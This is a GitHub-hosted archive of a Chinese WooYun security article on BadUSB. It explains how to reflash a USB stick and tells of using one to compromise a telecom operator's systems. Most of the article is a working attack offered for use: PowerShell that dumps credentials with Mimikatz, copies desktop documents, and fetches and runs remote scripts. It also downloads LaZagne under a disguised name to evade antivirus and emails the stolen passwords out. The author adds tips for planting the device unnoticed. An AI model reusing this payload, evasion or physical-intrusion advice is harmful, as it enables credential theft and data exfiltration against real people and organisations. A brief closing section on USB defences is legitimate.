forked from Trietptm-on-Security/WooYun-2
-
Notifications
You must be signed in to change notification settings - Fork 7
/
BadUsb----结合实例谈此类外设的风险.html
163 lines (105 loc) · 119 KB
/
BadUsb----结合实例谈此类外设的风险.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
<html>
<head>
<title>BadUsb----结合实例谈此类外设的风险 - HackPanda</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
</head>
<body>
<h1>原文地址:<a href="http://drops.wooyun.org/tips/9336">http://drops.wooyun.org/tips/9336</a></h1>
<p>
<h1>0x00 前言</h1>
<hr />
<p>大概是从今年年初的时候关注了这一块的话题,3月份买的TOSHIBA的U盘进行的测试,期间一直在完善利用代码,期间收到了一些大牛的启发,感谢Psychson这个项目的开源,DM_在PowerShell方面的文章,以及参考过三好学生,jeary等人的配置,虽然并没有交流,但是读了他们的帖子后实践完善了整个利用过程。这是<a href="https://github.com/adamcaudill/Psychson">BadUsb</a>的GitHub地址,以及原作者的操作视频(YouTube俄语翻译真心栏...自备梯子)</p>
<p>我在某乙方工作,一次去某省级运营商渗透前的交流时,因为来的早会议室还没有腾出来,在安全室休息时,我所坐的位置的人电脑没有锁屏,但是旁边都是安全室的人,这时候我拿出我的BadUsb,默默的去桌子底下系起了鞋带...</p>
<h1>0x01 BadUsb制作</h1>
<!--more-->
<hr />
<ul>
<li>首先你需要有一枚2303芯片的U盘,推荐平价的<a href="http://item.jd.com/929732.html">东芝(TOSHIBA) 速闪系列 U盘 16GB (黑色) USB3.0</a></li>
<li>Psychson项目文件</li>
<li>JRE</li>
<li>Burner File(BN03V104M.BIN只保证东芝这个U盘可以用)</li>
<li>SDCC</li>
</ul>
<p><a href="http://pan.baidu.com/s/1bniCcEV">打包下载</a>,密码: ixgw,包括量产工具,不包含JRE,win7_X64环境的编译好了可以直接用,项目文件夹下有command.txt可以参考,如果你是别的系统版本,请使用vs2012重新编译工具。</p>
<p><strong>PS:建议就刷我的final.txt修改脚本地址即可,这样不会存在需要重新刷短接芯片的情况,所有操作只需要修改服务器端的脚本即可。如果你已经刷坏,请先在不插电脑时短接住芯片上圆点斜对面的最外两个针脚,然后启动MPALL_F2_v363_0D.exe,用QC.ini,插到usb2.0口,Update几次没有的话说明你短接手法不好,ok了点start刷一下就恢复U盘了,再重头来</strong></p>
<h1>0x02 BadUsb效果</h1>
<hr />
<p>目前的效果是只需要5秒钟之内,可过某pc装机量5亿的杀软,电脑闪一下屏幕就可以拔下U盘了,剩下的交给后台的PowerShell进程,实现的功能有获取电脑的基本信息,Invoke-mimikatz抓密码,桌面截屏,集成<a href="https://github.com/AlessandroZ/LaZagne">LaZagne</a>获取系统存储的密码,递归获取桌面所有txt doc类 xls类文件,最终打成压缩包,可通过邮箱或者ftp发送,实战中建议使用ftp发送 <strong>ps:因为有人桌面的文档打包出来近GB...</strong></p>
<p>看我拿本机测试能得到什么</p>
<p>视频密码 HappyTime</p>
<p><img src="http://static.wooyun.org//drops/20151003/2015100309074194719badusb1.png" alt="badusb1" /></p>
<p><img src="http://static.wooyun.org//drops/20151003/2015100309074484956badusb2.png" alt="badusb2" /></p>
<p><img src="http://static.wooyun.org//drops/20151003/2015100309081339315tree.png" alt="tree" /></p>
<p><img src="http://static.wooyun.org//drops/20151003/2015100309074685764doc.png" alt="doc" /></p>
<p><img src="http://static.wooyun.org//drops/20151003/2015100309080320225screenshot.png" alt="screen" /></p>
<p><img src="http://static.wooyun.org//drops/20151003/2015100309075379769info.png" alt="info" /></p>
<p><img src="http://static.wooyun.org//drops/20151003/2015100309075910490Pass.png" alt="Pass1" /></p>
<p><img src="http://static.wooyun.org//drops/20151003/2015100309075419573pass2.png" alt="Pass2" /></p>
<h1>0x03 BadUsb实战</h1>
<hr />
<p>基本上从视频来看 算上装驱动大概需要10秒时间,实际执行Payload大概是5秒,所以只需要给你5秒,5秒你到底能做到什么?</p>
<p><strong>友情提醒</strong></p>
<ol>
<li>系鞋带动作要自然</li>
<li>速度要快</li>
<li>有小伙伴掩护那是再好不过的</li>
</ol>
<p>看看我们能得到什么</p>
<p><img src="http://static.wooyun.org//drops/20151003/2015100309074823831doc2.png" alt="doc2" /></p>
<p><img src="http://static.wooyun.org//drops/20151003/2015100309080578301secret.png" alt="secret" /></p>
<p>这个数据量有多恐怖,这只是一个安全室普通员工电脑桌面的信息,在后来对这些信息详细分析后发现了堡垒机跳板机的登录密码,以及堡垒机最高权限的账户,至此,该省所有设备都在控制之中,包括短彩信,智能网,长途网,话务网,以及基础设施,都收入囊中。</p>
<p><img src="http://static.wooyun.org//drops/20151003/2015100309081151619som-login.png" alt="login" /></p>
<p><img src="http://static.wooyun.org//drops/20151003/2015100309080730031som.png" alt="som" /></p>
<p><img src="http://static.wooyun.org//drops/20151003/2015100309080939984som2.png" alt="som2" /></p>
<p><img src="http://static.wooyun.org//drops/20151003/2015100309075099913email.png" alt="email" /></p>
<p>抱歉因为客户原因,无法透露过多细节,读者可当是概念证明,毕竟威胁真实存在。</p>
<h1>0x04 BadUsb-Exp</h1>
<hr />
<p>再次感谢Invoke-Mimikatz作者,感谢DM_,代码为拼接修改而来,照惯例留坑,防伸手党,勿怪 首先,仅通过BadUsb下载一个powershell脚本,其中在调用IEX继续下载新的PowerShell,这样设计是为了先拿到一份LaZagne获取的密码,因为有些人的桌面文档表格太大了,需要等待很久,避免夜长梦多所为。</p>
<pre><code>...
...#Invoke-Mimikatz
$folderDateTime = (get-date).ToString('d-M-y HHmmss')
$userDir = (Get-ChildItem env:\userprofile).value + '\Report ' + $folderDateTime
$fileSaveDir = New-Item ($userDir) -ItemType Directory
Invoke-Mimikatz -Dumpcreds >> $fileSaveDir'/DumpPass.txt'
$copyDir = (Get-ChildItem env:\userprofile).value + '\Desktop'
$copyToDir = New-Item $fileSaveDir'\Doc' -ItemType Directory
Dir -filter *.txt -recurse $copyDir | ForEach-Object {Copy-Item $_.FullName $copyToDir}
Dir -filter *.doc -recurse $copyDir | ForEach-Object {Copy-Item $_.FullName $copyToDir}
Dir -filter *.docx -recurse $copyDir | ForEach-Object {Copy-Item $_.FullName $copyToDir}
Dir -filter *.xls -recurse $copyDir | ForEach-Object {Copy-Item $_.FullName $copyToDir}
Dir -filter *.xlsx -recurse $copyDir | ForEach-Object {Copy-Item $_.FullName $copyToDir}
IEX (New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx/GetPass.ps1');
</code></pre>
<p>GetPass.ps1</p>
<pre><code>(new-object System.Net.WebClient).DownloadFile('http://x.x.x.x/GetPass.rar','D:\Get.exe');
(new-object System.Net.WebClient).DownloadFile('http://x.x.x.x/Command.rar','D:\Command.bat');
D:\Command.bat;
$SMTPServer = 'smtp.qq.com'
$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
$SMTPInfo.EnableSsl = $true
$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('username', 'password');
$ReportEmail = New-Object System.Net.Mail.MailMessage
$ReportEmail.From = 'email-address'
$ReportEmail.To.Add('To-address')
$ReportEmail.Subject = 'GetPass'
$ReportEmail.Body = 'Passwords In Applications'
$ReportEmail.Attachments.Add('D:\GetPass.txt')
$SMTPInfo.Send($ReportEmail)
remove-item 'D:\GetPass.txt'
remove-item 'D:\Get.exe'
</code></pre>
<p>其中的GetPass.rar实为LaZagne,直接下载exe会被大部分杀软拦截,所以使用重命名功能,之所以调用了一个批处理,是因为LaZagne的获取Windows密码模块(非sysadmin模块)注入Lsass进程是会被杀软拦截,所以(D:\Get.exe sysadmin & D:\Get.exe svn & D:\Get.exe database & D:\Get.exe browsers & D:\Get.exe wifi & D:\Get.exe mails) > D:\GetPass.txt 笨方法绕过杀软。</p>
<p>好现在是揭晓坑的时候了- -,破坏了这个脚本删除生成文件的地方~你们插完别人的电脑,这些临时文件就会一直在那里躺着~包括这些密码压缩包喔~</p>
<h1>0x05 Sec-Usb?</h1>
<hr />
<p>既然明白了风险存在,如何防护呢?</p>
<p>Know it,then protect it.</p>
<p>首先看一种暴力的 <a href="https://item.taobao.com/item.htm?spm=a230r.1.14.11.kKxDoZ&id=35528606576&ns=1&abbucket=19#detail">德国LINDY USB电脑锁 电子信息资料防护加密防盗防窃取</a> 直接锁死u口,可能适合跳板机,开发机使用,但是个人机器不现实。</p>
<p>再有就是类似sec-usb这种充电线了,断掉usb传输的两个data线,只保留power,这样就只能充电了,某厂商有这种商品,很贵呦~</p>
<p>链接: http://pan.baidu.com/s/1c09E7PQ 密码: 9b6p</p>
<h1>0xFF 版权声明</h1>
<hr />
<p>本文独家首发于乌云知识库(drops.wooyun.org)。本文并没有对任何单位和个人授权转载。如本文被转载,一定是属于未经授权转载,属于严重的侵犯知识产权,本单位将追究法律责任。</p> </p>
</body>
</html>